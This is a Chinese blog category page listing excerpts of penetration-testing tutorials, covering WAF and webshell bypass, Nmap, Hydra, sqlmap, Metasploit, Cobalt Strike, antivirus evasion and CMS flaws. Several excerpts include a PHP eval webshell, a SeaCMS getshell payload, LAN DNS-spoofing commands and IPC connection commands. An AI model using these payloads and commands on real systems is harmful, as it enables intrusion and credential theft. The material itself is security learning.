![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
工具使用
文章平均质量分 91
Wh0ale
自我介绍
展开
-
Waf Bypass
原创 2018-08-03 11:25:37 · 813 阅读 · 0 评论 -
Acunetix Web Vulnarability Scanner V10.5 详细中文手册
Acunetix Web Vulnarability Scanner V10.5 详细中文手册注:文本由U神原创,转载请注明作者和出处。目录:0×00、什么是Acunetix Web Vulnarability Scanner ( What is AWVS?)0×01、AWVS安装过程、主要文件介绍、界面简介、主要操作区域简介(Install AWVS and GUI Description)0×...转载 2018-06-29 17:52:11 · 744 阅读 · 0 评论 -
Python渗透测试工具合集
如果你热爱漏洞研究、逆向工程或者渗透测试,我强烈推荐你使用 Python 作为编程语言。它包含大量实用的库和工具,本文会列举其中部分精华。网络Scapy, Scapy3k: 发送,嗅探,分析和伪造网络数据包。可用作交互式包处理程序或单独作为一个库。pypcap, Pcapy, pylibpcap: 几个不同 libpcap 捆绑的python库libdnet: 低级网络路由,包括端口查看和以太网帧...转载 2018-06-24 10:06:15 · 1165 阅读 · 0 评论 -
Chrome开发者工具详解
Chrome开发者工具详解(1)-Elements、Console、Sources面板Chrome开发者工具面板面板上包含了Elements面板、Console面板、Sources面板、Network面板、Timeline面板、Profiles面板、Application面板、Security面板、Audits面板这些功能面板。这些按钮的功能点如下:Elements:查找网页源代码HTML中的任一...转载 2018-06-15 10:52:51 · 25139 阅读 · 0 评论 -
python运维之路
Windows下安装python2和python3双版本转载自:http://www.cnblogs.com/yyds/p/6080826.html现在大家常用的桌面操作系统有:Windows、Mac OS、ubuntu,其中Mac OS 和 ubuntu上都会自带python。这里我们只介绍下Windows(我用的Win10)环境下的python2.x 和 python3.x 的安装,以及pyt...转载 2018-05-23 09:50:02 · 1063 阅读 · 0 评论 -
Ophcrack与彩虹表
Ophcrack是一款利用彩虹表来破解 Windows密码的工具。其次是两篇有关Ophcrack的技术文章:杜莉翻译的“安全高手的利器认识彩虹哈希表破解工具”(http://tech.ccidnet.com/art/237/20070913/1211093_1.html),昵称为“寻找人生的起点”写的“使用Rainbow tables和Ophcrack的组合工具破解Windows密码”(http:...转载 2018-05-01 16:43:16 · 8544 阅读 · 0 评论 -
NMAP的正确食用方式
Nmap是一款应用最广泛的安全扫描工具,备受渗透人员和黑客的青睐,在对目标服务器进行扫描的时候,能够快速识别潜在的漏洞。NSE(Nmap Scripting Engine)作为Nmap的一部分,具有强大灵活的特性,允许使用者编写自己的脚本来完成各种各样的网络扫描任务。Nmap本身内置有丰富的NSE脚本,可以非常方便的利用起来,当然也可以使用定制化的脚本完成个人的需求。今天就要讲讲如何利用Nmap的...转载 2018-04-06 21:38:27 · 6625 阅读 · 0 评论 -
IoTSeeker:物联网设备默认密码扫描检测工具
IoTSeeker,Rapid7出品,是一款物联网默认密码凭据网络扫描工具,可以针对特定物联网设备进行扫描检测,发现IoT设备是否使用默认或出厂设置密码凭据。工具介绍前久美国大规模网络中断的原因,已被调查为恶意软件利用物联网设备(CCTV摄像机,DVR等)默认密码凭据,入侵感染,组建僵尸网络发起的DDoS攻击。IoTSeeker可以帮助企业扫描其网络中的物联网设备,检测其密码是否已被修改,或设备是...转载 2018-04-12 21:12:47 · 2622 阅读 · 0 评论 -
内网劫持结合metasploit
内网劫持命令:bettercap -X -I eth0 -G 192.168.211.1 -T 192.168.211.137 --dns '/root/桌面/dns.conf'ettercap -Tq -i eth0 -P dns_spoof -T 192.168.211.137ipconfig/flushdns 清除缓存echo 1 > /proc/sys/net/ipv4/ip_f...原创 2018-04-05 15:10:35 · 936 阅读 · 0 评论 -
Python学习资源
Python 资源大全中文版我想很多程序员应该记得 GitHub 上有一个 Awesome - XXX 系列的资源整理。awesome-python 是 vinta 发起维护的 Python 资源列表,内容包括:Web框架、网络爬虫、网络内容提取、模板引擎、数据库、数据可视化、图片处理、文本处理、自然语言处理、机器学习、日志、代码分析等。由伯乐在线持续更新。Awesome 系列虽然挺全,但基本只对...转载 2018-07-09 18:23:27 · 868 阅读 · 0 评论 -
CSRF漏洞学习
CORS处理跨域的一些小心得 经常在工作中遇到一些跨域的问题,最近用angularJS写一个后台系统,就遇到了一些跨域的问题,在这里分享下顺便记录下.部分内容引用的阮哥哥的文章,仅仅是为了方便学习浏览器将CORS请求分成两类:简单请求(simple request)和非简单请求(not-so-simple request)。只要同时满足以下两大条件,就属于简单请求。(1) 请求方...转载 2018-08-11 16:59:47 · 2126 阅读 · 0 评论 -
Webshell Bypass
如何优雅隐藏你的Webshell1. 优雅的Bypass一句话2. 优雅的Bypass大马3. 优雅的隐藏你的Webshell4. 对于自己的bypass心得以及总结Bypass思路1.代码拼接2.函数回调 1.Bypass一句话普通的一句话:<?php eval($_POST['x']); ?> //一句话使用命令执行...原创 2018-07-30 12:47:55 · 823 阅读 · 0 评论 -
PHPmyadmin Getshell
1. phpMyAdmin简介2. phpMyAdmin getshell思路3. phpMyAdmin 4.8.1 getshell实战SHOW VARIABLES LIKE ‘%secure_file_priv%”; 查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell我们首先需要检测的是MyS...原创 2018-07-21 13:17:56 · 6880 阅读 · 0 评论 -
Python编写脚本绕过WAF
环境搭建:网上在i春秋找的源码进行搭建Fuzz脚本思路如果有某狗存在的话,会对特殊字符进行拦截所以我们需要自己构造payloadFuzz脚本编写fuzz脚本样例#! -*- encoding:utf-8 -*-# python3import requestsfuzz_zs = ['/*','*/','/*!','*','=','`','!',...原创 2018-07-15 12:03:16 · 4339 阅读 · 0 评论 -
mysql命令大全
mysql命令大全1、连接Mysql格式: mysql -h主机地址 -u用户名 -p用户密码1、连接到本机上的MYSQL。首先打开DOS窗口,然后进入目录mysql\bin,再键入命令mysql -u root -p,回车后提示你输密码.注意用户名前可以有空格也可以没有空格,但是密码前必须没有空格,否则让你重新输入密码。如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到...转载 2018-07-12 19:43:31 · 300 阅读 · 0 评论 -
苹果CMS漏洞
1.环境搭建:最新版本好像修复了这个漏洞后来看大佬们分析是加了360safe、把他注释掉就可以复现了审计过程: 首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。...原创 2018-07-11 21:00:01 · 10777 阅读 · 0 评论 -
Seacms漏洞
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...原创 2018-07-10 12:21:27 · 5032 阅读 · 2 评论 -
整理下这半年pick的优秀博主
小草窝:https://x.hacking8.com/ https://github.com/boy-hack近期才freebuf发布了一篇自动化漏洞扫描神器W10scan,逛了下github还有博客感觉真的是一个很厉害的大佬,对他的很多python项目很感兴趣,长期pickChybeta:https://chybeta.github.io/ https://git...原创 2018-07-09 18:52:05 · 693 阅读 · 0 评论 -
avet之远程控制
0x01 简介avet是一款在github(https://github.com/govolution/avet )上的杀软绕过技术工具,同时也是2017亚洲黑帽大会(3月28日-7月31日)/美拉斯维加斯黑帽大会(7月22日-7月27日 PST)的arsnal(https://www.blackhat.com/us-17/arsenal/schedule/index.html)工具之一。这里是a...转载 2018-04-03 09:56:45 · 22743 阅读 · 1 评论 -
神兵利器--Cobalt Strike
前言经常看到披露出来APT(Advanced Persistent Threat) 高级持续性威胁报告,据目前我所了解到的有常用两种攻击手法还有更多种手法水坑式攻击和鱼叉式钓鱼邮件攻击手法。其实我也想模仿这样攻击手法在渗透时候遇到有些目标简直是无从下手。很早之前就接触了Metasploit工具内网渗透非常强大,当时用过Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形...原创 2018-04-10 09:02:03 · 4043 阅读 · 0 评论 -
wireshark初步学习
wireshark基本概念和过滤规则1.过滤IP,如来源IP或者目标IP等于某个IP例子:ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107或者ip.addr eq 192.168.1.107 // 都能显示来源IP和目标IPlinux上运行的wireshark图形窗口截图示例,其他过虑规则操作类似,不再截图。ip.src eq 10.175.16...转载 2018-01-05 19:21:14 · 314 阅读 · 0 评论 -
ettercap+driftnet+cookiehacker的一次实战
一、ettercap①打开ettercaproot权限下打开ettercap:ettercap -C (curses UI) ettercap -G (GTK+ GUI)②打开ettercap之后,选择Sniff----Unified-sniffing,然后选择网卡:③然后Hosts---Scan for hosts---Hosts list,此原创 2018-01-05 16:52:31 · 3697 阅读 · 0 评论 -
总结的CMD命令
一:net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$转载 2018-01-15 12:52:47 · 331 阅读 · 0 评论 -
hydra 九头蛇端口爆破
在安全中 最大的安全漏洞莫过于密码 本次文章来说一下 爆破在渗透测试中的用途或许有些小伙伴在渗透测试中 找不到注入点 或者储存xss 等一系列的漏洞的时候会选择放弃 但是你们有没有想过 爆破在渗透测试中也有这巨大的用途转载 2017-12-30 11:45:07 · 8708 阅读 · 0 评论 -
Nessus的整理
博客只发精品转载 2017-12-29 21:34:02 · 9086 阅读 · 0 评论 -
kali自动化渗透神器websploit模块介绍
websploit安装websploitroot@kali2:~# apt-get install websploitroot@kali2:~# websploitdb d8b db d88888b d8888b. .d8888. d8888b. db .d88b. d888888b d888888b 88 I8I 88 88' 88 `8D ...原创 2018-01-05 12:10:44 · 7410 阅读 · 1 评论 -
nmap+hydra 爆破3306实例
nmap:基本用法-A 扫描操作系统信息和路由跟踪-O 探测操作系统信息-v 远程机器更详细的信息-sA 探测该主机是否使用了包过滤器或防火墙-PN 扫描主机检测是否有防火墙保护-sP 找出网络中的在线主机-F 执行快速扫描-r 顺序扫描端口-sN 执行TCP空扫描以骗过防火墙-sS 执行一次隐蔽的扫描实际操作:nma原创 2018-01-03 10:55:19 · 16269 阅读 · 0 评论 -
sqlmap的基本命令使用 网络详细整合版!
比较好的两篇文章①SQLMAP注入教程-11种常见SQLMAP使用方法详解②SqlMap用户手册1. sqlmap Get注入./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库./sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库./sqlmap.py -u “注入地址”原创 2017-12-28 10:14:58 · 2317 阅读 · 0 评论 -
wireshark和QQ的前世今生
参考:①:Wireshark系列(从入门到精通的10个干货)②:利用WireShark破解网站密码③:一个很详细的博客主写的教程要通过截取数据包来破解QQ密码,首先要对QQ的通信协议有一定了解。只是通过抓包来分析的话,工作量相当巨大的,幸好现在网上有一些辅助的抓包工具,这样我们就可以轻易了解到QQ基本的通信协议, QQ 的通信协议是一套基于二进制的数据自主开发的应用转载 2018-01-08 10:04:32 · 2304 阅读 · 0 评论 -
一次抓包带给我的收获
参考:1.iOS抓包(使用BurpSuite和tcpdump)2.微信跳一跳秒shua分今天心血来潮,想用burp抓手机包玩玩的。之前其实也挺想弄,但是以为ios抓包需要越狱就没尝试后来在网上看几篇文章都说不需要,坚定了我要用iphone抓包的想法感谢一个群友给我的帮助一、burp抓包这里一直找不到iphone的描述文件安装,浪费了我大把的时间查找资料,最后通过phps原创 2018-01-17 15:50:32 · 1506 阅读 · 0 评论 -
Docker之漫漫人生路
Docker尝鲜Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现 虚拟化。容器是完全使用 沙箱 机制,相互之间不会有任何接口。1.Docker在开发和运维过程中,具有如下几个方面的优势具体说来,Docker在开发和运维过程中,具有如下几个方面的优势。更快速的交付和部署。使用Docker,开发人员可...原创 2018-03-27 15:36:33 · 2018 阅读 · 0 评论 -
使用BURP抓包IOS
Introduce开发过程中我们经常会需要对网络请求抓包,本次介绍的是使用BurpSuite抓取HTTP/HTTPS包,以及不越狱使用tcpdump抓取iPhone的网络包。使用BurpSuite对HTTP/HTTPS抓包开发中我们经常会需要对HTTP/HTTPS请求进行抓包。抓包实际上是在中间机器开了一个代理服务,让需要抓包的请求经过代理,我们就可以看到这些请求了。本质上是中间人攻击。BurpS...原创 2018-04-01 15:50:04 · 4742 阅读 · 1 评论 -
Metasploit内网渗透大杀器
一、基础用法1.数据库连接#1 首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;#2 初始化MSF数据库(关键步骤!):msfdb init;#3 运行msfconsole:msfconsole;#4 在msf中查看数据库连接状态:db_status。如果不想每次开机都这样,还可以配置随系统启动u...原创 2018-03-30 17:09:30 · 3203 阅读 · 0 评论 -
如何优雅使用vim
Linux vi/vim所有的 Unix Like 系统都会内建 vi 文书编辑器,其他的文书编辑器则不一定会存在。但是目前我们使用比较多的是 vim 编辑器。vim 具有程序编辑的能力,可以主动的以字体颜色辨别语法的正确性,方便程序设计。相关文章:史上最全Vim快捷键键位图 — 入门到进阶什么是 vim?Vim是从 vi 发展出来的一个文本编辑器。代码补完、编译及错误跳转等方便编程的功能特别丰富...转载 2018-03-29 21:29:52 · 354 阅读 · 0 评论 -
POC-T批量poc验证工具
POC-T神器介绍批量验证要解决的三个关键点: 数据:数据怎么来? 处理:逻辑是什么? 并发:如何实现?安装过程:git clone [url]https://github.com/Xyntax/POC-T[/url]pip install -r requirement.txtpython POC-T.py数据:数据来源很丰富,也很贴心。包括单个目标(-iS)、文件导入(-iF)、搜索引...原创 2018-03-22 20:49:47 · 12903 阅读 · 0 评论 -
pocsuite渗透神器介绍
pocsuite渗透神器介绍optional arguments: -h, --help Show help message and exit --version Show program's version number and exit --update Update Pocsuitetarget:...转载 2018-03-22 20:35:59 · 3737 阅读 · 0 评论 -
Pocsuite
0x00 前言pocsuite的用处就不多说了,早些时候也看到黑哥和余弦大佬在微博上说zoomeye 和pocsuite升级了。结合最近自己在审计cms,也想收集一下其他cms的poc,比如chybeta大佬的cmsPoc,还有Lucifer1993大佬的AngelSword,用pcosuite重新写一下poc,同时自己审出来的一些"0day"也是可以用这个框架。 0x01 文档文档在大概看完文档...转载 2018-03-08 11:56:28 · 2750 阅读 · 0 评论 -
1433端口的学习
1433端口的学习利用转载 2017-12-31 10:36:24 · 295 阅读 · 0 评论